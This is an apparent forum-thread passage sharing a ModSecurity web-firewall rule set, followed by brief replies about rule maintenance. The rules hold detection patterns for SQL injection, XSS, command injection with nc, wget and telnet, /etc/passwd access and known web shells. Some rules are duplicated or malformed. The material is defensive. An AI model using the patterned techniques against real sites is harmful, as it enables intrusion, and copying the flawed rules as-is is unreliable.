    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "@validateUrlEncoding" \
    	"chain, deny,log,auditlog,msg:'URL Encoding Abuse Attack Attempt',id:'950107',severity:'4'"
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\%(?![0-9a-fA-F]{2}|u[0-9a-fA-F]{4})"
    
    # Proxy access attempt
    SecRule REQUEST_URI ^http:/ "deny,log,auditlog,msg:'Proxy access attempt', severity:'2',id:'960014'"
    
    #
    # Restrict type of characters sent
    SecRule REQUEST_FILENAME|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer \
    	"@validateByteRange 1-255" \
    	"log,auditlog,msg:'Request Missing an Accept Header', severity:'2',id:'960015',t:urlDecodeUni,phase:1"
    
    SecRule ARGS|ARGS_NAMES "@validateByteRange 1-255" \
    	"deny,log,auditlog,msg:'Invalid character in request',id:'960901',severity:'4',t:urlDecodeUni,phase:2"
    
    # allow request methods
    SecRule REQUEST_METHOD "!^((?:(?:POS|GE)T|OPTIONS|HEAD))$" \
        "phase:1,log,auditlog,msg:'Method is not allowed by policy', severity:'2',id:'960032'"
    
    
    # Restrict file extension
    # removed exe so that frontpage will work
    
    # Restricted HTTP headers 
    SecRule REQUEST_HEADERS_NAMES "\.(?:Lock-Token|Translate|If)$" \
        "deny,log,auditlog,msg:'HTTP header is restricted by policy',id:'960038',severity:'4'"
    
    SecRule HTTP_User-Agent "(?:\b(?:m(?:ozilla\/4\.0 \(compatible\)|etis)|webtrends security analyzer|pmafind)\b|n(?:-stealth|sauditor|essus|ikto)|b(?:lack ?widow|rutus|ilbo)|(?:jaascoi|paro)s|internet explorer|webinspect|\.nasl)" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990002',severity:'2'"
    SecRule REQUEST_HEADERS_NAMES "\bacunetix-product\b" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990901',severity:'2'"
    SecRule REQUEST_FILENAME "^/nessustest" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990902',severity:'2'"
    
    SecRule REQUEST_HEADERS:User-Agent "(?:m(?:ozilla\/(?:4\.0 \(compatible; advanced email extractor|2\.0 \(compatible; newt activex; win32\))|ailto:craftbot\@yahoo\.com)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|siphon|wolf)|(?:collecto|irgrabbe)r|xtractorpro|o browse)|a(?:t(?:tache|hens)|utoemailspider|dsarobot)|w(?:eb(?:emailextrac| by mail)|3mir)|f(?:astlwspider|loodgate)|p(?:cbrowser|ackrat|surf)|(?:digout4uagen|takeou)t|(?:chinacla|be)[email protected]|rsync|shai|zeus)" \
            "deny,log,auditlog,msg:'Rogue web site crawler',id:'990012',severity:'2'"
    
    SecRule REQUEST_HEADERS:User-Agent "(?:\b(?:(?:indy librar|snoop)y|microsoft url control|lynx)\b|d(?:ownload demon|isco)|w(?:3mirror|get)|l(?:ibwww|wp)|p(?:avuk|erl)|cu(?:sto|rl)|big brother|autohttp|netants|eCatch)" \
            "chain,log,auditlog,msg:'Request Indicates an automated program explored the site',id:'990011',severity:'5'"
    SecRule REQUEST_HEADERS:User-Agent "!^apache.*perl"
    
    
    # Session fixation
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \
            "capture,ctl:auditLogParts=+E,log,auditlog,msg:'Session Fixation. Matched signature <%{TX.0}>',id:'950009',severity:'2'"
    
    # Blind SQL injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql.user)|c(?:onstraint_type|harindex)|attnotnull)\b|(?:locate|instr)\W+\()|\@\@spid\b)" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
    SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\b(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|(?:dba|mb)_users|xtype\W+\bchar|rownum)\b|t(?:able_name\b|extpos\W+\())" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950904',severity:'2'"        
    
    # SQL injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\b(?:(?:s(?:elect\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebtask)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|e(?:xecresultset|numdsn)|(?:terminat|dirtre)e|availablemedia|loginconfig|cmdshell|filelist|makecab|ntsec)|u(?:nion\b.{1,100}?\bselect|tl_(?:file|http))|group\b.*\bby\b.{1,100}?\bhaving|load\b\W*?\bdata\b.*\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction|open(?:rowset|query)|dbms_java)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?:\b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|(?:having|or|and)\b\s+?(?:\d{1,10}|'[^=]{1,10}')\s*?[=<>]+|(?:print\]\b\W*?\@|root)\@|c(?:ast\b\W*?\(|oalesce\b))|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|'(?:s(?:qloledb|a)|msdasql|dbo)')" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950001',severity:'2'"
    SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\b(?:user_(?:(?:object|table|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|substr(?:ing)?|table_name|mb_users|rownum)\b" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950906',severity:'2'"
    
    # XSS
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b| [vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:\.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\@import)\b)" \
            "capture,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack. Matched signature <%{TX.0}>',id:'950004',severity:'2'"
    
    # file injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Remote File Access Attempt. Matched signature <%{TX.0}>',id:'950005',severity:'2'"
    
    # Command access
    SecRule REQUEST_FILENAME "\b(?:n(?:map|et|c)|w(?:guest|sh)|cmd(?:32)?|telnet|rcmd|ftp)\.exe\b" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Access. Matched signature <%{TX.0}>',id:'950002',severity:'2'"
    
    # Command injection
    SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:(?:n(?:et(?:\b\W+?\blocalgroup|\.exe)|(?:map|c)\.exe)|t(?:racer(?:oute|t)|elnet\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\.exe|echo\b\W*?\by+)\b|c(?:md(?:(?:32)?\.exe\b|\b\W*?\/c)|d(?:\b\W*?[\\\/]|\W*?\.\.)|hmod.{0,40}?\+.{0,3}x))|[\;\|\`]\W*?\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\b|g(?:\+\+|cc\b))|\/(?:c(?:h(?:grp|mod|own|sh)|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|g(?:\+\+|cc)|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)(?:[\'\"\|\;\`\-\s]|$))" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950006',severity:'2'"
    SecRule "ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent" \
    		"\bwget\b" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950907',severity:'2'"
    
    # SSI injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'SSI injection Attack. Matched signature <%{TX.0}>',id:'950011',severity:'2'"
    
    # PHP injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open)|\$_(?:(?:pos|ge)t|session))\b|<\?(?!xml))" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'PHP Injection Attack. Matched signature <%{TX.0}>',id:'950013',severity:'2'"
    
    #suntzu
    SecRule REQUEST_URI|REQUEST_BODY|HTTP_Content-Disposition "/(suntzu.*|suntzu)\.php\?cmd="
    
    #Known rootkits
    SecRule REQUEST_URI|REQUEST_BODY "perl (xpl\.pl|kut|viewde|httpd\.txt)"
    SecRule REQUEST_URI|REQUEST_BODY "\./xkernel\;"
    SecRule REQUEST_URI|REQUEST_BODY "/kaiten\.c"
    SecRule REQUEST_URI|REQUEST_BODY "/mampus\?&(cmd|command)"
    
    # WEB-MISC .htpasswd access
    SecRule REQUEST_URI  "\.htpasswd" 
    
    # WEB-MISC /etc/passwd access
    SecRule REQUEST_URI  "/etc/passwd"
    
    #Exploit agent
    SecRule HTTP_User-Agent "Mosiac 1\.*"
    
    #remote bash shell
    SecRule REQUEST_URI "/shell\.php\&cmd="
    SecRule ARGS "/shell\.php\&cmd="
    
    # WEB-CGI formmail
    SecRule REQUEST_URI "/(formmail|mailform)(\x0a|\.pl\x0a)"
    
    #Invision Board ipchat.php file include
    SecRule REQUEST_URI "/hk/ipchat\.php*root_path*conf_global\.php"
    
    #Invision Power Board SQL injection
    SecRule REQUEST_URI "/hk/index\.php\?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=*(UNION|SELECT|DELETE|INSERT)"
    
    #Invision Gallery SQL Injection Vulnerabilities
    SecRule REQUEST_URI "/hk/index\.php" chain
    SecRule ARGS:comment "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| ]+[[:space:]](from|into|table|database|index|view)"
    
    
    # TIKIWIKI
    SecRule REQUEST_URI  "/tiki-map.phtml\?mapfile=\.\./\.\./"
    
    #Wordpress shell injection Vulnerability
    SecRule  REQUEST_URI "/cache/user.*/.*\.php\?cmd=" "id:390064,rev:1,severity:2,msg:'JITP: Wordpress shell injection Vulnerability'"
    
    #Bad agent
    SecRule HTTP_User-Agent "Brutus/AET"
    
    #Web leaches
    SecRule HTTP_User-Agent "Linux"
    SecRule HTTP_User-Agent "libcurl-agent"
    SecRule HTTP_User-Agent "TurnitinBot"
    SecRule HTTP_User-Agent "ANONYMOUS"
    SecRule HTTP_User-Agent "LinkWalker"
    SecRule HTTP_User-Agent "Drecombot"
    SecRule HTTP_User-Agent "Mac Finder"
    SecRule HTTP_User-Agent "ConveraCrawler"
    SecRule HTTP_User-Agent "WebarooBot"
    SecRule HTTP_User-Agent "RufusBot"
    SecRule HTTP_User-Agent "SumeetBot"
    SecRule HTTP_User-Agent "pulseBot"
    SecRule HTTP_User-Agent "FyberSpider"
    SecRule HTTP_User-Agent "1-More Scanner v1.25"
    SecRule HTTP_User-Agent "DRT-ResolveBot-Ignore"
    SecRule HTTP_User-Agent "T-H-U-N-D-E-R-S-T-O-N-E"
    SecRule HTTP_User-Agent "SnapPreviewBot"
    SecRule HTTP_User-Agent "IRLbot"
    SecRule HTTP_User-Agent "Charlotte"
    SecRule HTTP_User-Agent "ninetowns"
    SecRule HTTP_User-Agent "heritrix"
    SecRule HTTP_User-Agent "Python-urllib"
    SecRule HTTP_User-Agent "InetURL"
    SecRule HTTP_User-Agent "cazoodle"
    SecRule HTTP_User-Agent "DepSpid" "deny,nolog,status:410"
    SecRule HTTP_User-Agent "Browsezilla"
    SecRule HTTP_User-Agent "MetagerBot"
    SecRule HTTP_User-Agent "TALWinHttpClient"
    SecRule HTTP_User-Agent "Snapbot"
    SecRule HTTP_User-Agent "BDFetch"
    SecRule HTTP_User-Agent "WebaltBot"
    SecRule HTTP_User-Agent "VSynCrawler"
    SecRule HTTP_User-Agent "UbiCrawler"
    SecRule HTTP_User-Agent "WebCapture"
    SecRule HTTP_User-Agent "WebCopier"
    SecRule HTTP_User-Agent "FairAd Client"
    SecRule HTTP_User-Agent "Black Hole"
    SecRule HTTP_User-Agent "Crescent"
    SecRule HTTP_User-Agent "MIIxpc"
    SecRule HTTP_User-Agent "Harvest"
    SecRule HTTP_User-Agent "LinkextractorPro"
    SecRule HTTP_User-Agent "Snoopy"
    SecRule HTTP_User-Agent "IDBot"
    SecRule HTTP_User-Agent "Cyveillance" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "PEAR HTTP_Request class"
    SecRule HTTP_User-Agent "libwww-perl"
    SecRule HTTP_User-Agent "Exabot"
    SecRule HTTP_User-Agent "NeuralBot/0\.2"
    SecRule HTTP_User-Agent "Kenjin Spider"
    SecRule HTTP_User-Agent "CopyRightCheck" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "grub-client"
    SecRule HTTP_User-Agent "Web Downloader"
    SecRule HTTP_User-Agent "WebZIP"
    SecRule HTTP_User-Agent "WebPix"
    SecRule HTTP_User-Agent "WebCopier"
    SecRule HTTP_User-Agent "Webster"
    SecRule HTTP_User-Agent "WebZIP"
    SecRule HTTP_User-Agent "WebRipper"
    SecRule HTTP_User-Agent "WebStripper"
    SecRule HTTP_User-Agent "WebReaper"
    SecRule HTTP_User-Agent "HTTrack"
    SecRule HTTP_User-Agent "furl"
    SecRule HTTP_User-Agent "blackspider"
    SecRule HTTP_User-Agent "teleport pro"
    SecRule HTTP_User-Agent "combine"
    SecRule HTTP_User-Agent "Black Hole"
    SecRule HTTP_User-Agent "Attributor"
    SecRule HTTP_User-Agent "larbin"
    SecRule HTTP_User-Agent "jakarta"
    SecRule HTTP_User-Agent "LinkextractorPro"
    SecRule HTTP_User-Agent "SiteSnagger"
    SecRule HTTP_User-Agent "Schmozilla"
    SecRule HTTP_User-Agent "ProWebWalker"
    SecRule HTTP_User-Agent "LiteFinder"
    SecRule HTTP_User-Agent "CheeseBot"
    SecRule HTTP_User-Agent "Morfeus"
    SecRule HTTP_User-Agent "Teleport"
    SecRule HTTP_User-Agent "TMCrawler"
    SecRule HTTP_User-Agent "NetZIP"
    SecRule HTTP_User-Agent "Twiceler"
    SecRule HTTP_User-Agent "Nutscrape"
    SecRule HTTP_User-Agent "RedCarpet"
    SecRule HTTP_User-Agent "Nutch"
    SecRule HTTP_User-Agent "EmeraldShield.com"
    SecRule HTTP_User-Agent "Indy Library"
    SecRule HTTP_User-Agent "iCCrawler"
    SecRule HTTP_User-Agent "Attributor"
    SecRule HTTP_User-Agent "Nessus"
    SecRule HTTP_User-Agent "BecomeBot"
    SecRule HTTP_User-Agent "DiamondBot"
    SecRule HTTP_User-Agent "IWAgent"
    SecRule HTTP_User-Agent "BrightCrawler"
    SecRule HTTP_User-Agent "ia_archiver" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "WWW-Mechanize"
    
    #some broken attack program
    SecRule REQUEST_URI|REQUEST_BODY "PUT /.*_@@RNDSTR@@"
    SecRule REQUEST_URI|REQUEST_BODY "soeasywebsite\.com"
    
    #bandwidth consumers
    SecRule HTTP_User-Agent "CopyRightCheck" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "CopyGuard" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "Picscout" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "Digimarc WebReader" "deny,nolog,status:404"
    
    #spam bots
    SecRule HTTP_User-Agent  "DTS Agent"
    SecRule HTTP_User-Agent  "POE-Component-Client"
    SecRule HTTP_User-Agent  "WISEbot"
    SecRule HTTP_User-Agent  "^Shockwave Flash"
    SecRule HTTP_User-Agent  "Missigua"
    SecRule HTTP_User-Agent  "Java"
    
    #Gigablast
    SecRule HTTP_User-Agent "Gigabot" "deny,nolog,status:410"
    
    #e-mail collectors and spammers
    SecRule HTTP_User-Agent "WebBandit"
    SecRule HTTP_User-Agent "WEP Search 0"
    SecRule HTTP_User-Agent "Wells Search II"
    SecRule HTTP_User-Agent "psycheclone"
    SecRule HTTP_User-Agent "WEBMOLE"
    SecRule HTTP_User-Agent "Telesoft*"
    SecRule HTTP_User-Agent "WebEMailExtractor"
    SecRule HTTP_User-Agent "CherryPicker*"
    SecRule HTTP_User-Agent "NICErsPRO"
    SecRule HTTP_User-Agent "Advanced Email Extractor*"
    SecRule HTTP_User-Agent "EmailSiphon"
    SecRule HTTP_User-Agent "Extractorpro"
    SecRule HTTP_User-Agent "webbandit"
    SecRule HTTP_User-Agent "EmailCollector"
    SecRule HTTP_User-Agent "lwp-trivial"
    SecRule HTTP_User-Agent "WebEMailExtrac*"
    SecRule HTTP_User-Agent "EmailWolf"
    SecRule HTTP_User-Agent  "autoemailspider"
    SecRule HTTP_User-Agent  "EasyDL"
    SecRule HTTP_User-Agent  "ecollector"
    SecRule HTTP_User-Agent  "grub crawler"
    SecRule HTTP_User-Agent  "PycURL"
    SecRule HTTP_User-Agent  "DynaWeb"
    SecRule HTTP_User-Agent  "User-Agent"
    
    #
    SecRule HTTP_Referer|ARGS "brandimensions\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "Webclipping\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "cwrank\.com"
    SecRule HTTP_Referer|ARGS "hanzoweb\.com"
    SecRule HTTP_Referer|ARGS "exevior\.com"
    SecRule HTTP_Referer|ARGS "netshaq\.com"
    SecRule HTTP_Referer|ARGS "xomreviews\.com
    SecRule HTTP_Referer|ARGS "ufoseek\.com"
    SecRule HTTP_Referer|ARGS "everyfeed\.com"
    SecRule HTTP_Referer|ARGS "hanzoweb\.com"
    SecRule HTTP_Referer|ARGS "mysubject\.com"
    SecRule HTTP_Referer|ARGS "internetserviceteam\.com"
    SecRule HTTP_Referer|ARGS "site\.com"
    
    # Email Injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "[\n\r]\s*(?:to|bcc|cc)\s*:.*?\@" \
            "t:none,t:lowercase,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:501,msg:'Email Injection Attack. Matched signature <%{TX.0}>',id:'950019',severity:'2'"
    
    #new kit
    SecRule REQUEST_URI   "/c99shell\.txt"
    SecRule REQUEST_URI   "/c99\.txt\?"
    SecRule REQUEST_URI   "r0nin"
    SecRule REQUEST_URI   "m0rtix"
    
    #remote bash shell
    SecRule REQUEST_URI "/shell\.php\&cmd="
    SecRule ARGS "/shell\.php\&cmd="
    
    #c99 rootshell
    SecRule REQUEST_URI "\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"
    
    SecRule REQUEST_URI "/r57en\.php"
    
    #generic shell
    SecRule REQUEST_URI "shell\.txt"
    SecRule REQUEST_URI "test\.txt"
    
    #Forum shell rule
    SecRule REQUEST_URI "showtopic=http"
    
    #Known rootkit Defacing Tool 2.0
    SecRule REQUEST_URI "/tool(12)?[0-9]?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/tool\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/tool25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/therules25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    
    #Generic remote perl execution with .pl extension
    SecRule REQUEST_URI "\;(\s|\t)*perl .*\.pl"
    
    #New SEL attack seen
    SecRule REQUEST_URI|REQUEST_BODY "select.*from.*information_schema\.tables"
    
    #New SQL attack seen
    SecRule REQUEST_URI "and.+char\(.*\).+user.+char\(.*\)"
    
    #31dec
    SecRule REQUEST_URI   "/php\.txt\?"
    
    #1 jan
    SecRule REQUEST_URI   "/sql\.txt\?"
    SecRule REQUEST_URI   "bind\.(gif|jpe?g|txt|bmp|png)\?"
    
    #new unknown kits
    SecRule REQUEST_URI   "/iblis\.htm\?" 
    SecRule REQUEST_URI   "/gif\.gif\?" 
    SecRule REQUEST_URI   "/go\.php\.txt\?" 
    SecRule REQUEST_URI   "/sh[0-9]\.(gif|jpe?g|txt|bmp|png)\?" 
    SecRule REQUEST_URI   "/iys\.(gif|jpe?g|txt|bmp|png)\?" 
    SecRule REQUEST_URI   "/shell[0-9]\.(gif|jpe?g|txt|bmp|png)\?" 
    SecRule REQUEST_URI   "/zehir\.asp"
    SecRule REQUEST_URI   "/aflast\.txt\?"
    SecRule REQUEST_URI   "/sikat\.txt\?&cmd" 
    SecRule REQUEST_URI   "/t\.gif\?" 
    SecRule REQUEST_URI   "/phpbb_patch\?&"
    SecRule REQUEST_URI   "/phpbb2_patch\?&"
    SecRule REQUEST_URI   "/lukka\?&"
    Last edited by Frontpage1; 02-11-2008 at 09:40 AM. Reason: Update Modsec2 Config File

  6. #6
    Join Date
    May 2003
    Location
    Melbourne, Australia
    Posts
    341

    EXCELLENT

    EXCELLENT THREAD.

    We're also dealing with PHP exploit issue with the script "menro.php" being uploaded a few times recently, might want to add that to mod_security. Its a nasty little script, tells the hacker everything they want to know about the server and lets them do plenty of nasty things.

    Anyway - EXCELLENT THREAD !
    Last edited by bjdea1; 02-18-2008 at 07:39 PM.
    Deasoft.com Australia & USA Hosting - cPanel, WHM, VPS
    Software - WHMreseller - WHMexec - KVZcloud
    Host Repo - The Linux Web Host Knowledge Repository
    hostsearch.com.au - Host Search Australia

  7. #7
    These threads are very useful. Thank you for taking the time to help us all out.

    On a related note, does anyone have experience of the rules at gotroot.com? They seem to have put a lot of effort into them and I am thinking of deploying them. Before I do, do any of you have bad experiences of these?

  8. #8
    Join Date
    Sep 2003
    Location
    Earth!
    Posts
    55
    I'm from gotroot, we update the rules at least once a day for the new 2.5 format. The 1.x and 2.0 rulesets are no longer maintained, so you should absolutely update if you haven't already (we have rpms available for the centos/rhel/fedora folks). If you find a problem with the rules just let us know about it. Full support packages are available.
    Secure your server now: Atomic Secured Linux
    Troubleshooting Linux Firewalls in stores today

  9. #9
    Thank you for the reply, AT.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •